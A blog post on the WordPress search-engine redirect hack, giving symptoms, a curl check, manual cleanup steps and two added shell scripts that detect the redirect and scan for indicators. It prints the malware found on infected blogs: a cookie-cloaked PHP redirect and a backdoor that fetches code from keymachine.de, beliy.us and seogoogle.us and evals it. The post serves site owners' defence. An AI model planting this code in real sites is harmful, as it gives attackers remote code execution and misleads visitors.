WordPress Search Engine Redirect Hack: The Symptoms and How to Fix It

Recently a security exploit in WordPress has been taking the blogosphere by storm. It is a new kind of exploit because rather than defacing the site, taking it down, inserting links into the footer or other obvious attacks, it tries to conceal its existence.

It works just like a simple cloaking script, but this time it hides itself from the owner and from repeat visitors. Anyone whose browser already has a cookie set for that domain will see the blog as if nothing has happened.

On the other hand, people who arrive from a search engine for the first time are redirected to anyresults.net, keymachine.de, beliy.us and some other sites. Those sites are Made For AdSense (MFA) sites.

How to Reproduce It

The code hides itself from the blogger and from existing visitors by skipping the redirection whenever it finds any cookie set for the domain. If no cookie is found, it redirects the new visitor to the domains above.

Reproducing the hack is as simple as clearing the cookies for your domain. In Firefox, open the Privacy tab, select your blog's domain and click Remove Cookie. Internet Explorer users should click the Delete Cookies button in the Internet Options menu, under the General tab.

Search Google, Yahoo, MSN or another search engine for your keywords and click through to your blog. If it redirects, your WordPress installation has been cracked. You can also use the following Linux command line if you have shell access (your hosting provider may offer it):

curl -I -H "Referer: http://www.google.com/search?q=keyword" http://example.com

Visit the site manually by typing the address into your browser's address bar; you should see the blog as usual.
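As an added example (not part of the original post), the following shell script automates that check: it makes two cookie-less HEAD requests with curl, one carrying a search-engine Referer and one without, and flags the site when only the first is answered with a redirect to another host. It assumes curl is installed and that the blog URL is given as the first argument.

```shell
#!/bin/sh
# Added example, not from the original post: tell a cloaked redirect from a
# normal one by comparing two cookie-less requests, one with a search-engine
# Referer and one without. The hack fires only on the first kind.

# fetch_headers URL [REFERER] -> prints the response headers (HEAD request,
# no cookies sent, redirects not followed, so a 30x shows up as-is)
fetch_headers() {
    if [ -n "$2" ]; then
        curl -sS -I --max-time 15 -H "Referer: $2" "$1"
    else
        curl -sS -I --max-time 15 "$1"
    fi
}

# host_of URL -> bare host name, e.g. http://example.com/x -> example.com
host_of() {
    printf '%s\n' "$1" | sed -e 's#^[A-Za-z]*://##' -e 's#[/:].*##'
}

# redirects_offsite HEADERS SITE_HOST -> 0 when the headers carry a 30x status
# and a Location pointing at a different host, 1 otherwise
redirects_offsite() {
    headers=$(printf '%s\n' "$1" | tr -d '\r')
    status=$(printf '%s\n' "$headers" | sed -n '1s/^HTTP\/[0-9.]* \([0-9][0-9][0-9]\).*/\1/p')
    location=$(printf '%s\n' "$headers" | sed -n 's/^[Ll]ocation: *//p' | head -n 1)
    case "$status" in 30[0-9]) ;; *) return 1 ;; esac
    [ -n "$location" ] || return 1
    [ "$(host_of "$location")" != "$2" ]
}

# check_site URL -> 0 if both requests behave alike, 2 if only the
# search-engine visitor is sent elsewhere (the symptom described above)
check_site() {
    site=$(host_of "$1")
    search=$(fetch_headers "$1" "http://www.google.com/search?q=keyword")
    direct=$(fetch_headers "$1")
    if redirects_offsite "$search" "$site" && ! redirects_offsite "$direct" "$site"; then
        echo "SUSPECT: $1 redirects search-engine visitors but not direct ones"
        return 2
    fi
    echo "OK: $1 answers search-engine and direct visitors the same way"
}

# usage: sh check_redirect.sh http://example.com
if [ -n "$1" ]; then check_site "$1"; fi
```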

The WordPress Hack Symptoms

The following are the symptoms of affected blogs:

  • Sudden drop in traffic from search engines.
  • Massive loss of revenue during that period.
  • Possibly delisted by Google (at least the potential is there).

For those who don’t care about the technical details and want step-by-step instructions to get rid of this, jump to the solution section.

If you are interested in the technical details, here they are:

  • Traffic referred by Google, MSN, Live, Windows Live, AltaVista, Ask, Yahoo, AOL, CNN, and Weather (most are popular search engines) will be redirected to the cracker’s sites.
  • A visitor that has been cookied by the blog site will see the blog as usual. In this case, any kind of cookie counts, NOT only for users who have an account and login to the blog.
  • The following code may appear in the wp-blog-header.php file (in the root of your WordPress installation):
    <?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
     
    $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
     
    if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
  • A new plug-in with a random name, most likely ending in .jpg or .gif (image file extensions), appears in your WP installation. It is actually PHP code encoded in base64. Example: cddea_old.jpg. For the path to the rogue file, refer to the solution below; it may be in the theme or uploads directory.
  • Two modifications in wp_options: one to activate the plugin and another as an independent row containing the string rss_f541b3abd05e7962fcab37737f40fad8.
  • Clicks on the RSS entries that go to the blog can be redirected to those sites too.
  • This may be an unrelated attack, but one person reported having the following malicious code inserted into other WP files:
    if(isset($_GET['p'])) {
        $sock = @fsockopen('km20725.keymachine.de', 80);
        if($sock){
            fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
            fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
            while($content[] = fgets ($sock));
            $content = implode('', $content);
            @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
            fclose ($sock);
        }
    }
     
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
     
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
     
    eval(gzinflate(base64_decode(

Solution to Resolve the Hack

1. Check your WordPress theme files
Examine the header.php and index.php files for suspicious code. If there is code that looks something like:

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location:

then delete it.

If you have a backup of your theme files on your computer, re-upload them to the server, overwriting the copies there. Transfer the server copy to your computer first if you are not sure.

2. Search through your posts
Tip: Make sure you have the newest backup of your database.

Use phpMyAdmin to browse the WordPress MySQL database tables. Locate the active_plugins row inside the wp_options table. Go to that line (you may need to scroll to the right) and check whether it contains any suspicious path to an image file such as .jpg or .gif. The file name might be something like cddea_old.jpeg. Delete this file using FTP or the file manager inside your web hosting control panel.

Staying in the same wp_options table, locate the row with rss_f541b3abd05e7962fcab37737f40fad8 as the option_name. Delete that row.

Go to the Plugins area in your dashboard and deactivate and reactivate any existing plugin to refresh the data in this row (and get rid of the offending item).

3. Find the rogue user name
In the wp_users table, look for users that should not be there and for users with a null value in the user_nicename field, and delete them.

Clean up the wp_usermeta table of options associated with this user.

4. Disable directory indexing
If your server runs Apache, add the following line to the .htaccess file in the root directory of your domain or of the blog:

Options -Indexes

to prevent others from seeing the list of directories and files on your server under the domain.

5. Upgrade your blog to the latest version of WordPress
Go through the three-step upgrade process. Don't forget to back up your database, but don't overwrite old backups; you may need to restore a copy from before the attack.

This will get rid of the malicious code in wp-blog-header.php.

Some people reported that this hack works on 2.5.1 (currently the newest version of WordPress) too. If you are running it, overwrite all the files except wp-config.php and a few others; refer to the upgrade guide for the full list.

6. Change all passwords
Change the passwords for your WordPress login and your hosting account, and make them different from each other. Use a secure connection such as SSH or HTTPS when changing the hosting account password.

For a blog with multiple authors, ask them to change their passwords as soon as possible.

That's it. If you find any problem, you may want to restore a backup from a date before the attack. If you don't have one, restore the copy you made before modifying the values in the database tables and repeat the process once more.
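As an added example, not the post's own script, this shell script searches for the indicators named in steps 1, 2 and 4 above: the cookie-cloaked redirect in PHP files, image files that contain PHP, eval() of remotely fetched or inflated code, a missing Options -Indexes, and the two rogue wp_options rows in a mysqldump of the database. The blog root and the dump file name are assumptions passed on the command line.

```shell
#!/bin/sh
# Added example, not the post's own script: look for the indicators the post
# lists, in the WordPress tree and in a mysqldump of its database. The blog
# root and the dump file are assumptions passed as arguments.

# file_hits ROOT -> one "TAG: path" line per indicator found on disk
file_hits() {
    # the cookie-cloaked redirect, in theme files or wp-blog-header.php
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'sizeof\(\$_COOKIE\) *== *0' {} + | sed 's/^/REDIRECT-CODE: /'
    # "image" files that really contain PHP: the randomly named rogue plug-in
    find "$1" -type f \( -name '*.jpg' -o -name '*.jpeg' -o -name '*.gif' \) \
        -exec grep -lE '<\?php|base64_decode|eval\(' {} + | sed 's/^/PHP-IN-IMAGE: /'
    # eval of remotely fetched or inflated code in any PHP file
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'eval\(@?(file_get_contents|gzinflate)\(' {} + | sed 's/^/EVAL-FETCH: /'
    # directory listing still enabled, step 4
    grep -qs 'Options *-Indexes' "$1/.htaccess" || echo "NO-INDEXES-OFF: $1/.htaccess"
}

# dump_hits DUMP -> the two rogue wp_options rows from step 2, with dump line numbers
dump_hits() {
    grep -n 'rss_f541b3abd05e7962fcab37737f40fad8' "$1" | sed 's/^/ROGUE-OPTION: /'
    grep -n 'active_plugins' "$1" | grep -E '\.(jpe?g|gif)' | sed 's/^/IMAGE-PLUGIN: /'
}

# scan_files ROOT / scan_dump DUMP -> print the hits; return 0 if clean, 1 if not
scan_files() {
    hits=$(file_hits "$1")
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}
scan_dump() {
    hits=$(dump_hits "$1")
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# usage: sh wp_triage.sh /path/to/blog [dump.sql]
if [ -n "$1" ]; then
    scan_files "$1" || echo "-- file indicators found: see steps 1, 2 and 4"
    [ -n "$2" ] && { scan_dump "$2" || echo "-- database indicators found: see step 2"; }
fi
```

Hits only tell you where to look; the clean-up itself is still the manual work of steps 1 to 3.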
